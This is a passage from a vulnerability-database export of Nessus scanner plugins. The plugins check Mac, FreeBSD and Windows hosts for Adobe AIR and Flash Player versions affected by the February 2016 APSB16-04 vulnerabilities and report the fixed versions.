\"CVE-2016-0969\",\n \"CVE-2016-0970\",\n \"CVE-2016-0971\",\n \"CVE-2016-0972\",\n \"CVE-2016-0973\",\n \"CVE-2016-0974\",\n \"CVE-2016-0975\",\n \"CVE-2016-0976\",\n \"CVE-2016-0977\",\n \"CVE-2016-0978\",\n \"CVE-2016-0979\",\n \"CVE-2016-0980\",\n \"CVE-2016-0981\",\n \"CVE-2016-0982\",\n \"CVE-2016-0983\",\n \"CVE-2016-0984\",\n \"CVE-2016-0985\"\n );\n\n script_name(english:\"Adobe AIR for Mac <= 20.0.0.233 Multiple Vulnerabilities (APSB16-04)\");\n script_summary(english:\"Checks the version of AIR.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe AIR installed on the remote Mac OS X host is\nprior or equal to version 20.0.0.233. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A type confusion error exists that allows a remote\n attacker to execute arbitrary code. (CVE-2016-0985)\n\n - Multiple use-after-free errors exist that allow a remote\n attacker to execute arbitrary code. (CVE-2016-0973,\n CVE-2016-0974, CVE-2016-0975, CVE-2016-0982,\n CVE-2016-0983, CVE-2016-0984)\n\n - A heap buffer overflow condition exist that allows an \n attacker to execute arbitrary code. (CVE-2016-0971)\n\n - Multiple memory corruption issues exist that allow a\n remote attacker to execute arbitrary code.\n (CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\n CVE-2016-0967, CVE-2016-0968, CVE-2016-0969,\n CVE-2016-0970, CVE-2016-0972, CVE-2016-0976,\n CVE-2016-0977, CVE-2016-0978, CVE-2016-0979,\n CVE-2016-0980, CVE-2016-0981)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-04.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe AIR version 20.0.0.260 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0984\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_air_installed.nasl\");\n script_require_keys(\"MacOSX/Adobe_AIR/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nkb_base = \"MacOSX/Adobe_AIR\";\nversion = get_kb_item_or_exit(kb_base+\"/Version\");\npath = get_kb_item_or_exit(kb_base+\"/Path\");\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\ncutoff_version = '20.0.0.233';\nfixed_version_for_report = '20.0.0.260';\n\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version_for_report +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe AIR\", version, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T03:46:12", "description": "The version of Adobe Flash Player installed on the remote Mac OS X\nhost is prior or equal to version 20.0.0.286. It is, therefore,\naffected by multiple vulnerabilities :\n\n - A type confusion error exists that allows a remote\n attacker to execute arbitrary code. (CVE-2016-0985)\n\n - Multiple use-after-free errors exist that allow a remote\n attacker to execute arbitrary code. (CVE-2016-0973,\n CVE-2016-0974, CVE-2016-0975, CVE-2016-0982,\n CVE-2016-0983, CVE-2016-0984)\n\n - A heap buffer overflow condition exist that allows an \n attacker to execute arbitrary code. (CVE-2016-0971)\n\n - Multiple memory corruption issues exist that allow a\n remote attacker to execute arbitrary code.\n (CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\n CVE-2016-0967, CVE-2016-0968, CVE-2016-0969,\n CVE-2016-0970, CVE-2016-0972, CVE-2016-0976,\n CVE-2016-0977, CVE-2016-0978, CVE-2016-0979,\n CVE-2016-0980, CVE-2016-0981)", "edition": 26, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-09T00:00:00", "title": "Adobe Flash Player for Mac <= 20.0.0.286 Multiple Vulnerabilities (APSB16-04)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "MACOSX_FLASH_PLAYER_APSB16-04.NASL", "href": "https://www.tenable.com/plugins/nessus/88641", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88641);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/20\");\n\n script_cve_id(\n \"CVE-2016-0964\",\n \"CVE-2016-0965\",\n \"CVE-2016-0966\",\n \"CVE-2016-0967\",\n \"CVE-2016-0968\",\n \"CVE-2016-0969\",\n \"CVE-2016-0970\",\n \"CVE-2016-0971\",\n \"CVE-2016-0972\",\n \"CVE-2016-0973\",\n \"CVE-2016-0974\",\n \"CVE-2016-0975\",\n \"CVE-2016-0976\",\n \"CVE-2016-0977\",\n \"CVE-2016-0978\",\n \"CVE-2016-0979\",\n \"CVE-2016-0980\",\n \"CVE-2016-0981\",\n \"CVE-2016-0982\",\n \"CVE-2016-0983\",\n \"CVE-2016-0984\",\n \"CVE-2016-0985\"\n );\n\n script_name(english:\"Adobe Flash Player for Mac <= 20.0.0.286 Multiple Vulnerabilities (APSB16-04)\");\n script_summary(english:\"Checks the version of Flash Player.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Mac OS X\nhost is prior or equal to version 20.0.0.286. It is, therefore,\naffected by multiple vulnerabilities :\n\n - A type confusion error exists that allows a remote\n attacker to execute arbitrary code. (CVE-2016-0985)\n\n - Multiple use-after-free errors exist that allow a remote\n attacker to execute arbitrary code. (CVE-2016-0973,\n CVE-2016-0974, CVE-2016-0975, CVE-2016-0982,\n CVE-2016-0983, CVE-2016-0984)\n\n - A heap buffer overflow condition exist that allows an \n attacker to execute arbitrary code. (CVE-2016-0971)\n\n - Multiple memory corruption issues exist that allow a\n remote attacker to execute arbitrary code.\n (CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\n CVE-2016-0967, CVE-2016-0968, CVE-2016-0969,\n CVE-2016-0970, CVE-2016-0972, CVE-2016-0976,\n CVE-2016-0977, CVE-2016-0978, CVE-2016-0979,\n CVE-2016-0980, CVE-2016-0981)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-04.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 20.0.0.306 or later.\n\nAlternatively, Adobe has made version 18.0.0.329 available for those\ninstallations that cannot be upgraded to the latest version.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0984\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\nif (version =~ \"^(19|20)\\.\")\n{\n cutoff_version = \"20.0.0.286\";\n fix = \"20.0.0.306\";\n}\nelse\n{\n cutoff_version = \"18.0.0.326\";\n fix = \"18.0.0.329\";\n}\n# we're checking for versions less than or equal to the cutoff!\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T10:52:13", "description": "Adobe reports :\n\nThese updates resolve a type confusion vulnerability that could lead\nto code execution (CVE-2016-0985).\n\nThese updates resolve use-after-free vulnerabilities that could lead\nto code execution (CVE-2016-0973, CVE-2016-0974, CVE-2016-0975,\nCVE-2016-0982, CVE-2016-0983, CVE-2016-0984).\n\nThese updates resolve a heap buffer overflow vulnerability that could\nlead to code execution (CVE-2016-0971).\n\nThese updates resolve memory corruption vulnerabilities that could\nlead to code execution (CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\nCVE-2016-0967, CVE-2016-0968, CVE-2016-0969, CVE-2016-0970,\nCVE-2016-0972, CVE-2016-0976, CVE-2016-0977, CVE-2016-0978,\nCVE-2016-0979, CVE-2016-0980, CVE-2016-0981).", "edition": 26, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-11T00:00:00", "title": "FreeBSD : flash -- multiple vulnerabilities (5d8e56c3-9e67-4d5b-81c9-3a409dfd705f)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "modified": "2016-02-11T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin", "p-cpe:/a:freebsd:freebsd:linux-c6-flashplugin", "p-cpe:/a:freebsd:freebsd:linux-c6_64-flashplugin"], "id": "FREEBSD_PKG_5D8E56C39E674D5B81C93A409DFD705F.NASL", "href": "https://www.tenable.com/plugins/nessus/88684", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88684);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-0964\", \"CVE-2016-0965\", \"CVE-2016-0966\", \"CVE-2016-0967\", \"CVE-2016-0968\", \"CVE-2016-0969\", \"CVE-2016-0970\", \"CVE-2016-0971\", \"CVE-2016-0972\", \"CVE-2016-0973\", \"CVE-2016-0974\", \"CVE-2016-0975\", \"CVE-2016-0976\", \"CVE-2016-0977\", \"CVE-2016-0978\", \"CVE-2016-0979\", \"CVE-2016-0980\", \"CVE-2016-0981\", \"CVE-2016-0982\", \"CVE-2016-0983\", \"CVE-2016-0984\", \"CVE-2016-0985\");\n\n script_name(english:\"FreeBSD : flash -- multiple vulnerabilities (5d8e56c3-9e67-4d5b-81c9-3a409dfd705f)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe reports :\n\nThese updates resolve a type confusion vulnerability that could lead\nto code execution (CVE-2016-0985).\n\nThese updates resolve use-after-free vulnerabilities that could lead\nto code execution (CVE-2016-0973, CVE-2016-0974, CVE-2016-0975,\nCVE-2016-0982, CVE-2016-0983, CVE-2016-0984).\n\nThese updates resolve a heap buffer overflow vulnerability that could\nlead to code execution (CVE-2016-0971).\n\nThese updates resolve memory corruption vulnerabilities that could\nlead to code execution (CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\nCVE-2016-0967, CVE-2016-0968, CVE-2016-0969, CVE-2016-0970,\nCVE-2016-0972, CVE-2016-0976, CVE-2016-0977, CVE-2016-0978,\nCVE-2016-0979, CVE-2016-0980, CVE-2016-0981).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-04.html\"\n );\n # https://vuxml.freebsd.org/freebsd/5d8e56c3-9e67-4d5b-81c9-3a409dfd705f.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bd9b994c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-c6-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-c6_64-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-c6-flashplugin<11.2r202.569\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-f10-flashplugin<11.2r202.569\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-c6_64-flashplugin<11.2r202.569\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T06:15:13", "description": "The remote Windows host is missing KB3135782. It is, therefore,\naffected by multiple vulnerabilities :\n \n - A type confusion error exists that allows a remote\n attacker to execute arbitrary code. (CVE-2016-0985)\n\n - Multiple use-after-free errors exist that allow a remote\n attacker to execute arbitrary code. (CVE-2016-0973,\n CVE-2016-0974, CVE-2016-0975, CVE-2016-0982,\n CVE-2016-0983, CVE-2016-0984)\n\n - A heap buffer overflow condition exist that allows an \n attacker to execute arbitrary code. (CVE-2016-0971)\n\n - Multiple memory corruption issues exist that allow a\n remote attacker to execute arbitrary code.\n (CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\n CVE-2016-0967, CVE-2016-0968, CVE-2016-0969,\n CVE-2016-0970, CVE-2016-0972, CVE-2016-0976,\n CVE-2016-0977, CVE-2016-0978, CVE-2016-0979,\n CVE-2016-0980, CVE-2016-0981)", "edition": 33, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-09T00:00:00", "title": "MS16-022: Security Update for Adobe Flash Player (3135782)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "SMB_NT_MS16-022.NASL", "href": "https://www.tenable.com/plugins/nessus/88654", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88654);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/11/19\");\n\n script_cve_id(\n \"CVE-2016-0964\",\n \"CVE-2016-0965\",\n \"CVE-2016-0966\",\n \"CVE-2016-0967\",\n \"CVE-2016-0968\",\n \"CVE-2016-0969\",\n \"CVE-2016-0970\",\n \"CVE-2016-0971\",\n \"CVE-2016-0972\",\n \"CVE-2016-0973\",\n \"CVE-2016-0974\",\n \"CVE-2016-0975\",\n \"CVE-2016-0976\",\n \"CVE-2016-0977\",\n \"CVE-2016-0978\",\n \"CVE-2016-0979\",\n \"CVE-2016-0980\",\n \"CVE-2016-0981\",\n \"CVE-2016-0982\",\n \"CVE-2016-0983\",\n \"CVE-2016-0984\",\n \"CVE-2016-0985\"\n );\n script_xref(name:\"MSFT\", value:\"MS16-022\");\n script_xref(name:\"MSKB\", value:\"3135782\");\n\n script_name(english:\"MS16-022: Security Update for Adobe Flash Player (3135782)\");\n script_summary(english:\"Checks the version of the ActiveX control.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing KB3135782. It is, therefore,\naffected by multiple vulnerabilities :\n \n - A type confusion error exists that allows a remote\n attacker to execute arbitrary code. (CVE-2016-0985)\n\n - Multiple use-after-free errors exist that allow a remote\n attacker to execute arbitrary code. (CVE-2016-0973,\n CVE-2016-0974, CVE-2016-0975, CVE-2016-0982,\n CVE-2016-0983, CVE-2016-0984)\n\n - A heap buffer overflow condition exist that allows an \n attacker to execute arbitrary code. (CVE-2016-0971)\n\n - Multiple memory corruption issues exist that allow a\n remote attacker to execute arbitrary code.\n (CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\n CVE-2016-0967, CVE-2016-0968, CVE-2016-0969,\n CVE-2016-0970, CVE-2016-0972, CVE-2016-0976,\n CVE-2016-0977, CVE-2016-0978, CVE-2016-0979,\n CVE-2016-0980, CVE-2016-0981)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2016/ms16-022\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-04.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 2012, 8.1, RT 8.1,\n2012 R2, and 10.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0984\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS16-022';\nkbs = make_list(\"3135782\");\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, \"activex_init()\");\n\n# Adobe Flash Player CLSID\nclsid = '{D27CDB6E-AE6D-11cf-96B8-444553540000}';\n\nfile = activex_get_filename(clsid:clsid);\nif (isnull(file))\n{\n activex_end();\n audit(AUDIT_FN_FAIL, \"activex_get_filename\", \"NULL\");\n}\nif (!file)\n{\n activex_end();\n audit(AUDIT_ACTIVEX_NOT_FOUND, clsid);\n}\n\n# Get its version.\nversion = activex_get_fileversion(clsid:clsid);\nif (!version)\n{\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n}\n\ninfo = '';\n\niver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\niver = join(iver, sep:\".\");\n\n# all < 18.0.0.329 or 19 < 20.0.0.306\nfix = FALSE;\nif(iver =~ \"^(19|20)\\.\" && ver_compare(ver:iver, fix:\"20.0.0.306\", strict:FALSE) < 0)\n fix = \"20.0.0.306\";\nelse if(ver_compare(ver:iver, fix:\"18.0.0.329\", strict:FALSE) < 0)\n fix = \"18.0.0.329\";\n\nif (\n (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0) &&\n fix\n)\n{\n info = '\\n Path : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n}\n\nport = kb_smb_transport();\n\nif (info != '')\n{\n if (report_paranoia > 1)\n {\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit was\\n' +\n \"set for the control's CLSID because of the Report Paranoia setting\" + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n report = info +\n '\\n' +\n 'Moreover, its kill bit is not set so it is accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_add_report(bulletin:'MS16-022', kb:'3135782', report);\n security_report_v4(severity:SECURITY_HOLE, port:port, extra:hotfix_get_report());\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T11:04:56", "description": "The remote host is affected by the vulnerability described in GLSA-201603-07\n(Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, cause a Denial of Service condition, obtain\n sensitive information, or bypass security restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 25, "cvss3": {"score": 9.8, "vector": 